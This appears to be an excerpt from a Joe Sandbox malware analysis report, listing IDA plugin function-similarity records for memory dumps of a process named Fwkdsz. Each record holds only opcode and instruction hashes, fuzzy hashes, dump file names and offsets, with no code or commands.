                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 247969919a2cda1a612e01cb1da5c91fe33a76794ae0838173d34f1b8fa8301a
                                                                                                                                                                                                                                                • Instruction ID: 4334c55d366c6cbceb79f4fad4e4a00374a59496ec413c321a197bd914a6812e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 247969919a2cda1a612e01cb1da5c91fe33a76794ae0838173d34f1b8fa8301a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F32145B0D15209DBDB10DFAAD8447FEBBF6FB8A304F00442AD505A7385CB3859468FA2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 296f20034ddf345525327b5fd791aaa69936a0c8c471493fd78cfc48b22a7282
                                                                                                                                                                                                                                                • Instruction ID: 1c949e92b0be82cd3b0a0ea61002e7bdb6b1b11ad585535b58c120a8faf7b86c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 296f20034ddf345525327b5fd791aaa69936a0c8c471493fd78cfc48b22a7282
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A631EFB0904269CFDB64DF24D854BEEBBB1BB49301F0001EAD949A72A5D7764E80CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 892e795e29d95d49c7c157698823153ee4c7d3cb22ed732125ab61b3ebc46e4e
                                                                                                                                                                                                                                                • Instruction ID: 216f2ea4e7d97e27f29998efc1d9b79e07859f496df90320bd7951dd5f539f2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 892e795e29d95d49c7c157698823153ee4c7d3cb22ed732125ab61b3ebc46e4e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E113774D04229CFCB04CFAAD4456EFBBF6FB88310F00846ADA09B3250D7706A4ACB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2638821537.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_129d000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f5cca3b6083d3cd9d5895b52ac11f54ed2289ca6e68c0d87637972eb0d922851
                                                                                                                                                                                                                                                • Instruction ID: e6bf492ca9905743c7083f679cb1cfa7f20f4ccbf81dd1625ba2f8cf503b07dc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5cca3b6083d3cd9d5895b52ac11f54ed2289ca6e68c0d87637972eb0d922851
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3211D076504285CFDF12CF58D5C4B16BFB2FB84324F24C6A9D9090B656C33AD41ADBA2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 72c74ca6c287e5f858b817d3b0432bdf9d2987b9d17a6dcd8b8065682e2effb4
                                                                                                                                                                                                                                                • Instruction ID: ad4670bbbef4b519b148c78d7cbdc87d1316f3695d26f90a56180741f7417122
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72c74ca6c287e5f858b817d3b0432bdf9d2987b9d17a6dcd8b8065682e2effb4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D52104B0904268CFDB64DF28D898BDEBBB2FB49301F1001DAD909A7295D7724E80CF44
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2a2417b4a001c8b30eacbfd6ec5ea6cc1101f320976bffcd649c0f5d2ce7a89b
                                                                                                                                                                                                                                                • Instruction ID: 93fe5ff966cdea1a342d54c2e721a08716e0111ccbdec23906515aee8b198e40
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a2417b4a001c8b30eacbfd6ec5ea6cc1101f320976bffcd649c0f5d2ce7a89b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2621C4B0914268CFDB64DF24D854BDEBBB2BB49301F1001EAD949A72A5D7715EC0CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f99a322f26484b0abb7a31a2e3e44fd9d0e3e3e488e9eb1b3c1ee61016b0d488
                                                                                                                                                                                                                                                • Instruction ID: 75b3df850e67fdaf5e301ce2601883fee47ef634c3e98847225410d0b923568c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f99a322f26484b0abb7a31a2e3e44fd9d0e3e3e488e9eb1b3c1ee61016b0d488
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE21E2B4901228DFDB61CF64CD94BE8BBB2BB49304F0085EAD509A7250D7369E92DF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 042f4025e15d84364637bd4718ffb4c80650fa2bcd6c20357c3ec0f1319a74eb
                                                                                                                                                                                                                                                • Instruction ID: 2599d4a93fc2b1e50c75369023dde2338d66d103bb0d880203e9bd3a23d87ea0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 042f4025e15d84364637bd4718ffb4c80650fa2bcd6c20357c3ec0f1319a74eb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03117CB4E0120A9FCB40DFA8C548AAEBBF1FB48300F1484AAD919E7351E7309E41CF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2638746953.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_128d000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 16dbf9105f3a04f1a6919c8f163594efe4c9fba2a685c73e671b3ae419af5231
                                                                                                                                                                                                                                                • Instruction ID: 75b5f94c9bc209dcf1cbcd100da0d9123f4245efc0ca5a92e0dc9931004080af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16dbf9105f3a04f1a6919c8f163594efe4c9fba2a685c73e671b3ae419af5231
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C801263101A388AAE714BB99DCC4B66FFD8DF51325F18C42AEE094A2C6C7789848C771
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 559a23d087b30d67140b55b99cf9da7b2cca2b8715022865c3d23752e0512dab
                                                                                                                                                                                                                                                • Instruction ID: 931a4091850f55b3bd50cc72bd4d8fe06c17d4e302ab0d2545b50af863a5be33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 559a23d087b30d67140b55b99cf9da7b2cca2b8715022865c3d23752e0512dab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11C2B49142688FDB64DF28D894BEEBBB2BB49301F1001EAD949A7295D7715EC0CF84
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7b6e700b074f43a87bb926e28f9b355ee2460d11b2e9b683b75a91ccc62a95d2
                                                                                                                                                                                                                                                • Instruction ID: 3f1d7a7b705f719a67082c5bf292e78684d02cd1542b622c43804a0ffb30fb92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b6e700b074f43a87bb926e28f9b355ee2460d11b2e9b683b75a91ccc62a95d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6111F3B0E15209CFEB24DF9AD484BDEBBF6EB46300F14906AD508AB254DB309C45CF20
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c48c0e728d8a5af21c6b2f18c991b93a4e6c4254a04f0c03cab8d1dc08685d7
                                                                                                                                                                                                                                                • Instruction ID: 009eabba20580a78d94a7fcdd70432d203edd064794f46a966b5ccbef2abdd62
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c48c0e728d8a5af21c6b2f18c991b93a4e6c4254a04f0c03cab8d1dc08685d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF11D3B4914268CFDB64DF28D894BEEBBB2BB49301F1001DAD949A7295D7715EC0CF84
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7472453c0ee282dcfec25c0470b0a076cd0c8933f595788c046a975255aaa617
                                                                                                                                                                                                                                                • Instruction ID: a9a2e4a77f3a24648ff2cb3e8913d8556e4e7d518cad67eca120a222bba03dbe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7472453c0ee282dcfec25c0470b0a076cd0c8933f595788c046a975255aaa617
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B11E5B090011ACFCB68DF29C980BE9F7B6BF49310F1085EAC509AB250DB319E82CF54
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4d4a50202108a7125d8f583eb72f1e8c1f9eea3c77b423dde9e0aa1839433fb4
                                                                                                                                                                                                                                                • Instruction ID: 61453f626128c9a801921011f4b60275fe2781d79b5d746f16c90d55b472d106
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d4a50202108a7125d8f583eb72f1e8c1f9eea3c77b423dde9e0aa1839433fb4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09015A35B00218CFCB04EF59D594AADB7F6FF99614F5584A9D009EB360CB319C0ACB80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2045186f0d4c990513765fd29a51faf51d2b860004c83846fb156f184a28c3bf
                                                                                                                                                                                                                                                • Instruction ID: 92f7eea4ba3dc449d958b09f60d3e272723c8d1489953a1680b12522629601b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2045186f0d4c990513765fd29a51faf51d2b860004c83846fb156f184a28c3bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211ACB4901268DFDB64DF14DD84BECBBB1BB49300F1085EADA49A7290DB755E818F80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 403107d70c91f91e36f8e1e4f7f7e68d0b77c8b2d1fe0efca9105792b95b1a2e
                                                                                                                                                                                                                                                • Instruction ID: 0a7335138937b423c9b98d83d59ad3c254cab69c75b12302abcb81699b9dec03
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 403107d70c91f91e36f8e1e4f7f7e68d0b77c8b2d1fe0efca9105792b95b1a2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9411F3B0901229CFEB61CF59C988BDEBBB2FB84304F009597D909AB240D7745E88CF21
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a622f9ff58aecd6705c4dee23e09bd7f4b2f2b526d9ded4d17b353d448bd77b8
                                                                                                                                                                                                                                                • Instruction ID: d4c5bd419a4f82a0f0853ec69e5e960e8f940b2d7c43f70e129224b9a744a07f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a622f9ff58aecd6705c4dee23e09bd7f4b2f2b526d9ded4d17b353d448bd77b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14119BB4916228DFDBA0DF18D984BE8FBB1BB09300F1085EAD649A7290D7B55ED1CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2638746953.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_128d000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4a69c057017aba1d6f3620e0cc3e1d3685f1061b981537b7c913d0819a8f4ec9
                                                                                                                                                                                                                                                • Instruction ID: cdec5f5e0c194dee0dac9b67b99d263948f1a12486bdcb186fd55b53d916992d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a69c057017aba1d6f3620e0cc3e1d3685f1061b981537b7c913d0819a8f4ec9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0F0C232009388AEE7149A09DC84B62FFD8EB41734F18C45AEE084A2C6C378A844CA70
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 507754f15076583aafe4f1afcc61bfcc947f913858c6501f0a3aeb86659992ef
                                                                                                                                                                                                                                                • Instruction ID: 30888c3b3d3a7ee8553b60b8c159360d5727da82170ef8ea5fdef47d206e3958
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 507754f15076583aafe4f1afcc61bfcc947f913858c6501f0a3aeb86659992ef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07014B71C0420ADFCF15EF94D8448EABB70FF49320F05C55AE95467212D735A6A6DF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 37dcf47102f6ca78ea3e8c0959f5d1ba4c262f42b4e114727ba6f7adbdd2bc4f
                                                                                                                                                                                                                                                • Instruction ID: 3f12582af45002f451e5e4f96697bc13a91a2dfc15b300259807154691571d62
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37dcf47102f6ca78ea3e8c0959f5d1ba4c262f42b4e114727ba6f7adbdd2bc4f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7301A5B4A0122ACFDB90DF54C944BEDB7B1FB48314F1080EAD519A7395DA345E81CF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 97f4992d9a922943a3e25f3697463beb0807e383c90d96bdf6977b84a1949960
                                                                                                                                                                                                                                                • Instruction ID: 4b834f3a22a5d3ad3ca60b6f8387eb5e8ac17f557698a9060354b3fc4ce5f6f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f4992d9a922943a3e25f3697463beb0807e383c90d96bdf6977b84a1949960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF0E771C0020AEBCF15EF99D8049EEBB75FF89320F00C51AE95827210D732A5A6DFA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: acd6c9d4f3392b84ebd1f1e7ece05077e89baa95b8207835728260ee86dab906
                                                                                                                                                                                                                                                • Instruction ID: 3be02105a48660db12c195f8a28d50ce59ec0a0b5ddb65adfe640c8e25ed54da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acd6c9d4f3392b84ebd1f1e7ece05077e89baa95b8207835728260ee86dab906
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF09A75848248AFCB12CFB8D8009ECBFB4EB4A310F0081AAEC44A7251D2364E52EF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f9836772ea2d59a46dc335b69cca0618a071a4dc9e28f13073d5dad4ec17ead0
                                                                                                                                                                                                                                                • Instruction ID: 2cc88b762bcd180467026d705f670dae8591cd8cde1f4e744b429b6cce714fbe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9836772ea2d59a46dc335b69cca0618a071a4dc9e28f13073d5dad4ec17ead0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F05E79844148AFCB11CF98D8509EDBFB5EF09310F14859AEC4857352D27A4E53EF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d16038d38f37d06b2a3dabb3080234a1f2203eb2d1ac7d3cc1fae82c53e51fb7
                                                                                                                                                                                                                                                • Instruction ID: 12ef4f7d9b6019523af145e731aaa20d757a18784838d92ecbe17b2c2135f13f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d16038d38f37d06b2a3dabb3080234a1f2203eb2d1ac7d3cc1fae82c53e51fb7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F08274908248EFCB15CF94D814AEDBF75BF2E300F18819AEC845B351D6324912EF61
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d18926fc3fb60a8b4e9c89e34579898c8ca53a24f57b8238e8ce989613bdb8d3
                                                                                                                                                                                                                                                • Instruction ID: 243015e84ee90fc47c5d45c1613b640be99dad5815a8a5b6e8fa331cd81bc570
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d18926fc3fb60a8b4e9c89e34579898c8ca53a24f57b8238e8ce989613bdb8d3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF03074D092489FC755DFA8C8556ECBFF4AB06204F1444DAD888C7392D6319F41DF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0a1d6663a90bdd1b812738ac736d4b46c0cbb3734b6481dc687a1f93278ac683
                                                                                                                                                                                                                                                • Instruction ID: fbf8f77c5314c7f14e55b2f87e26cb9d0e28ae2f1efb1933f6cf631080ee1b30
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a1d6663a90bdd1b812738ac736d4b46c0cbb3734b6481dc687a1f93278ac683
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACF05E75909248AFC711DFA4D8106ECBFB8EF4A310F15819AD89457392D2314A45EF51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1fc1d5f83bacd0ec063ff0a2a44f4c21b7be82ad30c74d5200824015c974fd02
                                                                                                                                                                                                                                                • Instruction ID: f8dffecfe2f9ed85ea0bd7243c78d9431571412f6739a49214a1a5680ff50744
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fc1d5f83bacd0ec063ff0a2a44f4c21b7be82ad30c74d5200824015c974fd02
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F01EF7180165ADBDF21DF58C944BDAB7B2FF49304F0086AAE609B7210D775AEA5CF80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
